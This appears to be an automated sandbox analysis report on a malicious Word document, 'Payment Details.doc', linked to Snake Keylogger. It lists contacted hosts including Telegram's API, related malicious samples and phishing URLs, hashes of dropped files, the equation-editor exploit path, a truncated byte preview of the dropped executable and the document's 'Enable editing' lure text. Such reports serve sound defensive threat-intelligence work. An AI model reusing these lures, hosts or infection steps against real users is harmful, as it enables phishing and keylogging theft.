                        https://reallyfreegeoip.org/xml/ncfplgpeter20306.exe, 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002521000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        132.226.8.169
                        		unknownUnited States
                        		16989UTMEMUSfalse
                        149.154.167.220
                        		api.telegram.orgUnited Kingdom
                        		62041TELEGRAMRUtrue
                        188.114.97.3
                        		reallyfreegeoip.orgEuropean Union
                        		13335CLOUDFLARENETUStrue
                        66.63.187.123
                        		unknownUnited States
                        		8100ASN-QUADRANET-GLOBALUStrue
                        193.122.6.168
                        		unknownUnited States
                        		31898ORACLE-BMC-31898USfalse
                        188.114.96.3
                        		unknownEuropean Union
                        		13335CLOUDFLARENETUSfalse
                        193.122.130.0
                        		unknownUnited States
                        		31898ORACLE-BMC-31898USfalse
                        158.101.44.242
                        		unknownUnited States
                        		31898ORACLE-BMC-31898USfalse
                        132.226.247.73
                        		checkip.dyndns.comUnited States
                        		16989UTMEMUSfalse

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1519253
                        Start date and time:2024-09-26 09:23:55 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 9m 10s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                        Number of analysed new started processes analysed:14
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Payment Details.doc
                        Detection:MAL
                        Classification:mal100.troj.spyw.expl.evad.winDOC@11/14@26/9
                        EGA Information:
                        • Successful, ratio: 66.7%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 58
                        • Number of non-executed functions: 125
                        Cookbook Comments:
                        • Found application associated with file extension: .doc
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Active ActiveX Object
                        • Scroll down
                        • Close Viewer
                        • Override analysis time to 77835.314195445 for current running targets taking high CPU consumption
                        • Override analysis time to 155670.62839089 for current running targets taking high CPU consumption

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                        • Execution Graph export aborted for target EQNEDT32.EXE, PID 3272 because there are no executed function
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • Report size getting too big, too many NtSetInformationFile calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: Payment Details.doc

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        03:24:56API Interceptor302x Sleep call for process: EQNEDT32.EXE modified
                        03:25:01API Interceptor8522599x Sleep call for process: ncfplgpeter20306.exe modified
                        03:25:02API Interceptor21x Sleep call for process: powershell.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        132.226.8.169Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • checkip.dyndns.org/
                        TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                        • checkip.dyndns.org/
                        Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • checkip.dyndns.org/
                        rTEKL__FTALEPVEF__YATTEKL__F__.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • checkip.dyndns.org/
                        rPROFORMAINVOICE-PO_ATS_1036pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                        • checkip.dyndns.org/
                        z9OutstandingPayment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • checkip.dyndns.org/
                        rPO_CW00402902400438.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • checkip.dyndns.org/
                        MCB_09252024.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • checkip.dyndns.org/
                        QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                        • checkip.dyndns.org/
                        PI-96328635,PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • checkip.dyndns.org/
                        149.154.167.220Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                            Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              https://link.edgepilot.com/s/ac2abbfe/hqsaYDfTTkaTmtUeMi97cg?u=https://telecommunications-delicious-oriental-hu.trycloudflare.com/owa%23jfrench@coastalorthopedics.comGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                    inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      Confirmaci#U00f3n de pago_shrunk.exeGet hashmaliciousAgentTeslaBrowse
                                        SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exeGet hashmaliciousMicroClipBrowse

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            reallyfreegeoip.orgQUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 188.114.96.3
                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.97.3
                                            TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.96.3
                                            Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.96.3
                                            SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.97.3
                                            z95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 188.114.96.3
                                            SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                            • 188.114.97.3
                                            inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.96.3
                                            SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.97.3
                                            Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.96.3
                                            checkip.dyndns.comQUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 193.122.130.0
                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 193.122.130.0
                                            TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                            • 132.226.8.169
                                            Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 132.226.8.169
                                            SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 193.122.6.168
                                            z95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 132.226.247.73
                                            SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                            • 193.122.130.0
                                            inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 158.101.44.242
                                            SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 132.226.247.73
                                            Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 132.226.247.73
                                            api.telegram.orgThyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            https://link.edgepilot.com/s/ac2abbfe/hqsaYDfTTkaTmtUeMi97cg?u=https://telecommunications-delicious-oriental-hu.trycloudflare.com/owa%23jfrench@coastalorthopedics.comGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                            • 149.154.167.220
                                            SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                            • 149.154.167.220
                                            inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            Confirmaci#U00f3n de pago_shrunk.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220
                                            SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exeGet hashmaliciousMicroClipBrowse
                                            • 149.154.167.220

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            TELEGRAMRUThyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            http://mintlink32.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                            • 149.154.167.99
                                            https://bostempek.vercel.app/Get hashmaliciousPorn ScamBrowse
                                            • 149.154.167.99
                                            https://telegram-privatefree.pages.dev/Get hashmaliciousUnknownBrowse
                                            • 149.154.167.99
                                            http://tes.lavender8639.workers.dev/Get hashmaliciousUnknownBrowse
                                            • 149.154.167.99
                                            https://live-prons-sex.pages.dev/Get hashmaliciousPorn ScamBrowse
                                            • 149.154.167.99
                                            https://telegrambot-resolved.pages.dev/Get hashmaliciousUnknownBrowse
                                            • 149.154.167.99
                                            http://tw2-mzd.pages.dev/Get hashmaliciousUnknownBrowse
                                            • 149.154.167.99
                                            CLOUDFLARENETUSQUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 188.114.96.3
                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.96.3
                                            450230549.exeGet hashmaliciousAgentTeslaBrowse
                                            • 162.159.134.233
                                            64.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.61.3
                                            450230549.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.134.233
                                            PO-100001499.exeGet hashmaliciousFormBookBrowse
                                            • 188.114.96.3
                                            ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                            • 104.21.64.108
                                            TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.96.3
                                            https://qwehikd-asdu.xyz/Get hashmaliciousUnknownBrowse
                                            • 188.114.96.3
                                            https://geminishdw-dws.top/Get hashmaliciousUnknownBrowse
                                            • 188.114.97.3
                                            UTMEMUSThyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 132.226.247.73
                                            TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                            • 132.226.8.169
                                            Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 132.226.247.73
                                            z95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 132.226.247.73
                                            SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 132.226.247.73
                                            Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 132.226.247.73
                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 132.226.247.73
                                            file.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 132.226.247.73
                                            rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                            • 132.226.247.73
                                            cargo details.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 132.226.247.73

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            05af1f5ca1b87cc9cc9b25185115607dThyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.97.3
                                            Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.97.3
                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.97.3
                                            BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 188.114.97.3
                                            Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 188.114.97.3
                                            1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 188.114.97.3
                                            K0hpP6V2fo.rtfGet hashmaliciousDBatLoader, RemcosBrowse
                                            • 188.114.97.3
                                            AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 188.114.97.3
                                            SPEC.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 188.114.97.3
                                            Payment Slip.xlsGet hashmaliciousDBatLoader, RemcosBrowse
                                            • 188.114.97.3
                                            36f7277af969a6947a61ae0b815907a1Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            BANK PAYMENT COPY.docGet hashmaliciousXWormBrowse
                                            • 149.154.167.220
                                            14bnOjMV2N.docGet hashmaliciousUnknownBrowse
                                            • 149.154.167.220
                                            6b58b6.msiGet hashmaliciousPureLog StealerBrowse
                                            • 149.154.167.220
                                            RFQ_PO_KMM7983972_ORDER_DETAILS.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                            • 149.154.167.220
                                            RFQ.vbsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                            • 149.154.167.220
                                            SWIFT DETAILS-ERROR.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            SecuriteInfo.com.Exploit.CVE-2018-0798.4.26981.24309.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220

                                            Dropped Files

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Users\user\AppData\Roaming\ncfplgpeter20306.exePayment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HgCppsoKmxQq[1].exePayment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):0.34726597513537405
                                                Encrypted:false
                                                SSDEEP:3:Nlll:Nll
                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:@...e...........................................................

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HgCppsoKmxQq[1].exe

                                                Download File
                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):704000
                                                Entropy (8bit):7.875943883609069
                                                Encrypted:false
                                                SSDEEP:12288:nqR++ZR3W83B1LViDaDHkzrmvK0eVMfNHczr9wdG7gZf0mMlJEdtTJJ:nE++Zc8NilrAKHV+NHcH9F7jmMb4
                                                MD5:42F2CE52A57E0D72EAC297A532354E42
                                                SHA1:7F2F1EF38365147865F1CEC2C1D0AD62CDC6F7D0
                                                SHA-256:516FFDB4EF149292E235BEA6B676674D973E52C3382FDD3C40F85245F9E564BA
                                                SHA-512:6BD38183780B7DC761CFEAAFB3742F17A1CEADE827FC0D815CFF8969F0FD530E4ACE5FB70754E056FED44939EF774A4F5EF4B6A7FE9EC2F4C43BB3C49D4BFEEE
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 29%
                                                Joe Sandbox View:
                                                • Filename: Payment Slip.doc, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0......$......v.... ........@.. ....................... ............@.................................$...O........ ........................................................................... ............... ..H............text...|.... ...................... ..`.rsrc.... ......."..................@..@.reloc..............................@..B................X.......H........Y..\5..........,....&...........................................0..|........(..........(....}......{....(....}........(....}........(....}........(....}........(....}........(....}........(....}....*.0..!..........(.... l...Y m...Z..(....X.+..*....0..m........s....}..... ....}.....#......cA}..... .ig.}.....#......c.}..... .'....s....}........s....}......}......}.....(.......(.......8..........>...%..,.o....s.......{.....{....(....}......{.....{....( ...}......{.....{

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{0756F379-F867-4575-9849-7F804588B1EA}.tmp

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):16384
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:CE338FE6899778AACFC28414F2D9498B
                                                SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                Malicious:false
                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2467304B-9A7F-4216-A178-345DF60D02BC}.tmp

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1024
                                                Entropy (8bit):0.05390218305374581
                                                Encrypted:false
                                                SSDEEP:3:ol3lYdn:4Wn
                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                Malicious:false
                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{794E83B5-1211-427D-8DAD-C70F617D4336}.tmp

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):93184
                                                Entropy (8bit):3.521847451767833
                                                Encrypted:false
                                                SSDEEP:768:6gI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g05gIS:pSyemuSyemuSyemuSyemuSyemm1ezHTO
                                                MD5:FDD6243B84E1E9FB5D2969D4C64D1E62
                                                SHA1:FB0A4B12E4178A0EA5624DC3C96C94218F2CAFC8
                                                SHA-256:C6B9262DCB25A127205869DB042A52AA304935D14CDE045DCC8F280BDE87D823
                                                SHA-512:F682B4C724CA53035C1E08985D55CE85DC46560C4C4C88541D3FCB0AE3D2B6FABEBA7977659863BF89440594CCCB21E7D270001FD0BF85D03E0B879EF52715F6
                                                Malicious:false
                                                Preview:4.7.7.0.4.9.1.8.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7A2436E1-D288-4E59-B221-CB607A24B4B4}.tmp

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1536
                                                Entropy (8bit):1.357318797251612
                                                Encrypted:false
                                                SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbS:IiiiiiiiiifdLloZQc8++lsJe1MzB
                                                MD5:F81A16138F994EE04B29A4AD2EC9B830
                                                SHA1:E367EDB3AD7944C7E2FF5B72D439BF6EA98E427B
                                                SHA-256:48802A32AF2857EB5606D0048EDBEFBC2B16660E0CD15022CD3C47E07716E838
                                                SHA-512:A6C01D14440DBFA70359FD11CC70949DCC50C4E0B80E41939CA41A846DCCBE829C186EA63145E447428C584AB2FFC7DE23288248C18858F52F74D40A1F09C44A
                                                Malicious:false
                                                Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\dfaoslnz.syj.psm1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Preview:1

                                                C:\Users\user\AppData\Local\Temp\npvyho4d.dxj.ps1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Preview:1

                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Payment Details.LNK

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:07 2023, mtime=Fri Aug 11 15:42:07 2023, atime=Thu Sep 26 06:24:54 2024, length=541766, window=hide
                                                Category:dropped
                                                Size (bytes):1039
                                                Entropy (8bit):4.551873477181621
                                                Encrypted:false
                                                SSDEEP:24:85Hn/XTnSd4XWWu+cgJePeJ8Dv3qekw57u:89n/XTA4G+JGAekw9u
                                                MD5:8B3A5CB173191B5FE8A6AA842726DF8B
                                                SHA1:3673A534D429CB05E1A1D8CA07213EA4CE55E2AB
                                                SHA-256:AA5CD23F5FEBF651EE7423EFC5E375179D753708072BBAA8CEA8AB99A8BDA1B4
                                                SHA-512:BEE9475438C70ECF74D3011B2F353BF2C8E893C66757F5EAC4850436E837D0C1055D09F043D86312701CFEACBDB37E5B037EE2E99C4D9AE9D15BADE8BAC57DF0
                                                Malicious:false
